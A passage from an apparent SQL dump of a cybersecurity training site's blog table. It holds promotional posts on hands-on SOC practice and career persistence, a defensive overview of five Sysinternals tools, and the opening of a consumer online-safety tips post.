Hands-on training readies you to meet these challenges head-on.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">A Competitive Edge</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike other job seekers who only showcase certifications, your practical experience makes you stand out in interviews, positioning you as a highly capable candidate.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Gain an Edge in Cybersecurity Job Interviews</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A major advantage of completing hands-on SOC training is how it prepares you for job interviews. 
Instead of only presenting certifications, imagine being able to share real-world scenarios you’ve handled with confidence.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hiring managers often ask questions like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><strong>“How would you respond to a live cybersecurity threat?”</strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><strong>“What tools have you used for threat detection and incident response?”</strong></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><strong>“Can you take us through a real-world incident you’ve managed?”</strong></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With practice from <b><strong class=\"font-bold\">InfosecLabs</strong></b>, you’ll have concrete answers to these questions, backed by practical experience in handling enterprise-level cybersecurity operations. This not only impresses employers but also ensures they trust you in critical situations.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Not Just Learning—Mastering the SOC Environment</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> isn’t just a learning tool—it\'s an immersive experience in a true security operations center environment. 
You won’t just practice with tools like Splunk or CrowdStrike; you’ll master them in-depth, preparing yourself to tackle the challenges of a real SOC analyst role.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This experience is invaluable for developing the problem-solving, teamwork, and technical skills employers demand. You’ll gain deep insights into incident response plans, communication protocols, and decision-making processes—things that simply can’t be learned from textbooks or online courses.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Hands-On Learning Matters More Than Ever</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape is increasingly complex and dynamic, requiring professionals to adapt to evolving threats and technologies. Hands-on practice offers a unique opportunity to build the skills necessary for success, including:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-World Problem Solving</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learn how to diagnose and resolve issues quickly and effectively.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Confidence</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Feel prepared to 
manage incidents and tools under pressure.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Immediate Value for Employers</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stand out from other candidates by demonstrating proficiency from day one.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Kickstart Your Cybersecurity Career</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry is competitive, but <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> gives you the practice opportunity you need to succeed. By combining theoretical knowledge with expert-guided, hands-on practice, you’ll equip yourself for the diverse challenges of the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re serious about landing your first job as a SOC analyst—or taking the next big step in your career—practical training through InfosecLabs could be the game-changing opportunity you’ve been waiting for.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><a href=\"https://infoseclabs.io/start\" target=\"_blank\" rel=\"noopener\"><b><strong class=\"font-bold\">Start Practicing Today</strong></b></a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The path to a brighter and more secure future starts now. Take the next step in your cybersecurity career by signing up for the <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> today. 
Enhance your skills, gain practical experience, and build the confidence needed to excel in one of the most dynamic fields in tech.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your future in cybersecurity awaits. Start your hands-on training now and stand out in a competitive job market.</p>', '', NULL, NULL, 1, 'draft', '2025-02-03 20:03:42', '2026-01-12 21:41:44', 'Information Security', 'Why Practice is Essential to Master Cybersecurity', '', NULL),
(50, '5 Must-Know Sysinternals Tools for Cybersecurity Professionals', '5-must-know-sysinternals-tools-for-cybersecurity-professionals', '# Mastering Sysinternals: Essential Tools for Cybersecurity Professionals\n\nWhen it comes to safeguarding systems and detecting threats, the right tools can make all the difference. Sysinternals, a suite of utilities developed by Microsoft, offers powerful tools for managing, troubleshooting, and securing Windows environments. Whether you\'re new to cybersecurity or an experienced professional, understanding and leveraging these tools is essential. Here\'s a breakdown of five key Sysinternals tools that every cybersecurity learner and professional should master, along with detailed use cases to help you get started.\n\n## 1. Process Explorer\n\n### Purpose\n\nProcess Explorer is an advanced task manager that provides deep visibility into running processes, their dependencies, and system performance.\n\n### Key Features\n\n- Detailed process tree view.\n- Information on parent-child process relationships.\n- Insights into resource usage, threads, and handles.\n\n### Use Cases\n\n- **Identifying Malicious Processes**: Detect suspicious or malicious processes by analyzing digital signatures, parent-child relationships, and unusual resource consumption.\n- **DLL Injection Detection**: Identify injected dynamic link libraries (DLLs) that may compromise system security.\n- **Troubleshooting Resource Overuse**: Pinpoint processes that are causing high CPU, memory, or I/O usage, helping keep systems optimized.\n\n### How Process Explorer Helps\n\nThis tool is invaluable for spotting anomalies in your system. For example, if a process with an unverified signature or high CPU usage stands out, it may point to malware activity that requires immediate attention.\n\n## 2. 
Autoruns\n\n### Purpose\n\nAutoruns provides a comprehensive view of all startup programs, services, and other auto-start entries on a system.\n\n### Key Features\n\n- Displays all auto-start entries, including registry entries, scheduled tasks, and services.\n- Allows users to disable unnecessary or malicious startup items.\n\n### Use Cases\n\n- **Malware Persistence Investigation**: Detect unauthorized executables or scripts configured to launch at system startup. This helps identify malware designed to survive reboots.\n- **System Cleanup**: Optimize system performance and security by disabling unnecessary or unauthorized startup entries.\n\n### How Autoruns Helps\n\nFor cybersecurity learners, Autoruns highlights how threat actors establish persistence. Practice reviewing entries and identifying suspicious items to build your skills in analyzing potential security risks.\n\n## 3. TCPView\n\n### Purpose\n\nTCPView simplifies real-time monitoring of active TCP/UDP connections, providing insights into which processes are communicating over the network.\n\n### Key Features\n\n- Live tracking of all active network connections.\n- Mapping of network activity to specific processes and endpoints.\n\n### Use Cases\n\n- **Network Threat Detection**: Monitor live connections to identify unauthorized or suspicious activity, such as unexpected connections to unknown IP addresses.\n- **Incident Response**: Determine which network connections are involved in data exfiltration attempts or command-and-control (C2) communications during an attack.\n\n### How TCPView Helps\n\nTCPView is critical for cybersecurity professionals focused on network security. By becoming proficient with this tool, you’ll gain the ability to track threats, analyze connections, and identify compromised endpoints quickly.\n\n## 4. Sysmon (System Monitor)\n\n### Purpose\n\nSysmon delivers detailed logging of system events, such as process creation, network connections, and file operations. 
Its high-fidelity logs are a treasure trove for advanced threat detection and forensic investigations.\n\n### Key Features\n\n- Tracks key system events like file creation, registry modifications, and network communication.\n- Generates logs that can be fed into SIEM or other threat detection platforms.\n\n### Use Cases\n\n- **Advanced Threat Hunting**: Record detailed activity logs and analyze these to track attacker behavior, including lateral movement or privilege escalation.\n- **Endpoint Monitoring**: Provide your SIEM tools with robust logs for correlating suspicious activities and detecting anomalies.\n\n### How Sysmon Helps\n\nUnderstanding Sysmon\'s configuration is essential. For beginners, start by configuring it to log events like process creation and network activity. This hands-on practice is key to mastering threat hunting and network defense.\n\n## 5. PsExec\n\n### Purpose\n\nPsExec is a versatile tool for executing commands or scripts on remote systems, offering cybersecurity professionals powerful remote administration capabilities.\n\n### Key Features\n\n- Enables control of remote systems without requiring interactive logins.\n- Ideal for executing scripts and batch files at scale.\n\n### Use Cases\n\n- **Patch Deployment**: Streamline the installation of security patches across multiple systems, ensuring enterprise-wide protection against vulnerabilities.\n- **Incident Response**: Remotely collect forensic data from compromised systems, disable malicious processes, or execute clean-up scripts.\n\n### How PsExec Helps\n\nFor learners, mastering PsExec is invaluable for managing systems across networks. 
Learning to deploy patches or execute commands remotely is an essential skill for administering and securing large environments.', '', 'http://infoseclabs.io/uploads/1773587128156-577726583.jpg', 'Cybersecurity professional using Sysinternals tools on a computer', 1, 'published', '2026-03-15 09:16:00', '2026-03-15 19:07:57', 'Information Security', 'Top 5 Sysinternals Tools for Cybersecurity Pros', 'Discover essential Sysinternals tools for managing, troubleshooting, and securing Windows environments in cybersecurity.', 'Sysinternals tools'),
(51, 'Break Into Cybersecurity and Overcome Rejections', 'break-into-cybersecurity-and-overcome-rejections', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaking into cybersecurity can be challenging, especially if you\'re just starting out and facing rejection after rejection. The good news? You don’t need ten certifications or years of experience to succeed. What you really need is persistence, a hunger to learn, and the right mindset.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From complete beginners to career changers, countless professionals have launched their dream cybersecurity careers by following these six proven principles. If you’re ready to build your future in this exciting field, this guide is your blueprint.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hustle for Opportunities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Landing a cybersecurity job isn’t about waiting for the perfect listing to pop up—it’s about being proactive. 
You need to create opportunities by putting yourself out there and staying visible to potential employers.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Hustle Tactics to Try:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Send personalized LinkedIn messages to cybersecurity professionals.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Reach out directly to hiring managers or team leaders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Attend networking events, webinars, and cybersecurity conferences.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Follow up on applications instead of waiting for responses.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One aspiring cybersecurity analyst sent over <b><strong class=\"font-bold\">many connection requests on LinkedIn</strong></b>. After weeks of rejections, she finally landed an interview and secured a role on one of the best companies\' security teams.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Networking and visibility are game-changers. 
Consistently reaching out keeps you on recruiters’ radar, opening doors to opportunities others may miss.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Learn from Failures</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Rejections are tough—but they’re also invaluable lessons. Each “no” is a chance to refine your skills, improve your approach, and get closer to your dream job.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Learn from Rejections:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Analyze why you weren’t selected—lack of skills? Weak interview? Missing certifications?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Focus on plugging those gaps with study, practice, or mentorship.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Treat each rejection as data to improve your strategy.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity professional failed <b><strong class=\"font-bold\">two certification exams</strong></b> and was rejected after five interviews. 
Instead of giving up, they identified weaknesses, improved their interview skills, and earned certifications—all within six months. Now, they\'re thriving at a leading security firm.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Failures are stepping stones. Use them to prepare for bigger challenges and opportunities ahead.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ignore the Naysayers</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">“You don’t have enough experience.\" \"Cybersecurity is too competitive.\" If you’re pursuing a career in cybersecurity, you’ve probably heard it all before. The truth is, pursuing your goals often means going against the doubters.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Stay Motivated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Focus on your long-term dreams, not opinions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Surround yourself with supportive individuals, like mentors or online cybersecurity communities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use negativity as fuel for your determination.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong 
class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A career changer began studying cybersecurity at the age of 55, despite being told it was “too late.” Through persistence and rigorous learning, they built an impressive skill set and now lead the security team at a global corporation.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Block out the doubters. Stay focused, determined, and prove them wrong.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Put in the Hard Work</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity rewards diligence and structure more than shortcuts. The most successful candidates dedicate consistent effort to building their skills and portfolios.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Work Smarter:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Dedicate specific hours daily to study or hands-on labs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Develop a portfolio of projects that showcase your skills.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Learn through practical resources like simulated labs and training platforms (check out 
<b><strong class=\"font-bold\">InfosecLabs</strong></b> for top-notch tools).</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One candidate spent <b><strong class=\"font-bold\">two hours every day</strong></b> on hands-on labs and building a portfolio. Nine months later, their portfolio helped secure a dream role. It showcased their talent and stood out to recruiters.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Success in cybersecurity requires discipline. Stay consistent, track your progress, and showcase tangible results.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Give Back to the Community</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a collaborative field where helping others enhances your own knowledge and reputation. 
Sharing your expertise or supporting peers creates opportunities you might not expect.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Give Back:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Participate in online communities like Reddit, Discord, or LinkedIn cybersecurity groups.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Share educational content, such as tutorials, blog posts, or videos.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mentor others who are new to cybersecurity.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Trust Yourself</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Impostor syndrome is common in cybersecurity—it’s easy to feel like you don’t know enough or don’t belong. The reality? 
No one knows everything, and growth comes from a willingness to learn.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How to Build Confidence:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Focus on your progress, not perfection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Adopt a mindset where each challenge is an opportunity to grow.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Remember that even the top cybersecurity experts started from scratch.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Success Story:</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One beginner struggled with self-doubt but committed to a daily learning schedule. With time and experience, confidence came naturally—and they landed an advanced cybersecurity role.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> Believe in your ability to adapt and learn. 
Confidence will grow with every milestone you achieve.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Launch Your Cybersecurity Career Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaking into cybersecurity can be intimidating, but it’s absolutely achievable if you commit to these six rules. From hustling for opportunities to fostering self-confidence, each step gets you closer to your goal.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, every rejection is one step closer to success. Stay persistent, keep learning, and believe in your potential—the cybersecurity world needs driven individuals like you.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re ready to elevate your skills, explore <b><strong class=\"font-bold\">InfosecLabs</strong></b>. Our platform provides hands-on tools, expert-curated labs, and community support to help you kickstart your dream career.</p>', '', NULL, NULL, 1, 'draft', '2025-02-01 00:19:46', '2026-01-12 21:41:44', 'Information Security', 'Break Into Cybersecurity and Overcome Rejections', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(52, '7 Cybersecurity Tips Easy to Do', '7-cybersecurity-tips-easy-to-do', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When it comes to protecting yourself online, many people stick to the basics—strong passwords, two-factor authentication (2FA), and using a VPN. But did you know there are other simple and highly effective cybersecurity practices that often go unnoticed? These methods can protect your information, prevent data breaches, and safeguard your identity online. Let\'s explore these seven underrated yet easy-to-implement cybersecurity tips.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use a Separate Email for Sensitive Activities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Create a dedicated email address specifically for your financial accounts, such as banking, investments, or other high-priority accounts. This makes it harder for phishing attacks to succeed, as hackers won\'t know which email address is linked to your sensitive activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Why it works</em></i>:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your primary email, which is widely used for subscriptions, communication, or online registrations, is more likely to end up in the hands of bad actors. 
By using a \"secret\" email that you don\'t share publicly, you minimize the risk of scammers accessing important accounts through phishing emails.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">How to do it</strong></b>:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create a new email account using a secure provider like Gmail, ProtonMail, or Tutanota.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Update email settings in your financial accounts to use this new address exclusively.</li>\r\n</ol>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Use Virtual Credit Cards for Online Transactions</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual credit 